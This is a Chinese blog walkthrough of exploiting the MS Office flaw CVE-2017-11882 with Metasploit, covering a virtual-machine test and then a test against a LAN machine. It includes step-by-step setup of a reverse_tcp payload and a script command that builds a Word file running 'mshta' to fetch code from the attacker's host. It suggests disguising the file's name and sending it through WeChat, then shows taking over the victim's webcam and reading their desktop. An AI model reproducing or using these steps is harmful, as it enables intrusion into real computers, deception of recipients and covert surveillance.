MSF滲透測試-CVE-2017-11882(MSOffice漏洞)


1.測試環境

2.測試前准備

3.測試過程

—3.1虛擬機環境測試

—3.2局域網靶機測試

4.測試感想

1.測試環境

攻擊機:

OS:kail

IP:192.168.15.132/192.168.137.231

靶機:

OS:Windows7

Office版本:Office2013_CN

IP:

2.測試前准備

1.下載python腳本

2.下載MSF組件

3.將cve_2017_11882.rb復制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目錄下

4.把下載的cve_2017_11882.rtf復制到/usr/share/metasploit-framework/data/exploits/目錄下

5.把Command109b_CVE-2017-11882.py復制到/root目錄下

3.測試過程

3.1虛擬機環境測試

1.msfconsole執行search命令

2.設置payloadreverse_tcp,設置LHOST192.168.15.132,設置URIPATHtest(之后利用python腳本生成doc文件的時候也要使用相同路徑)

3.show options顯示設置

4.exploit -j運行

5.另開一個terminalpython Command109b_CVE-2017-11882.py -c "mshta http://192.168.15.132:8080/test" -o kail_help.doc

6.把生成的kail_help復制到靶機中打開,是個空白文檔

7.回連成功

8.sessions -i 1接管活動會話1,shell可以看到已經成功滲透靶機

3.2局域網靶機測試

0.更改kail網絡鏈接模式由NAT->橋接,獲得一個與靶機在同一網段下的IP192.168.137.231

1.更改一下LHOST,重新生成一個doc文件,exploit -j監聽

2.將文件改名為kail_help2.doc通過微信發給靶機(隨便改啥,具有迷惑性就行)

3.靶機打開doc,Windows7防火牆處於打開狀態,無殺軟

4.攻擊機獲得回連,sessions -i 1接管

5.webcam_stream可以直接控制攝像頭進行直播

6.shell中獲取靶機桌面信息

4.測試感想

  • 前人栽樹,后人乘涼。githubmeterpreter-db上有漏洞相關的msf模塊python腳本可以直接使用
  • 老舊系統、軟件十分不靠譜,易於攻入。其實還實踐了WindowsDefender+Windows10的組合,WinodowsDefender會直接將doc文件殺掉,但是這個版本的WIN7還是應用很廣的,包括Office2013可以說是學生中應用十分廣泛的版本(這個Windwos鏡像和office2013都是徐日老師FTP服務器上的版本,在DKY安裝率應該還是很有保證的)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM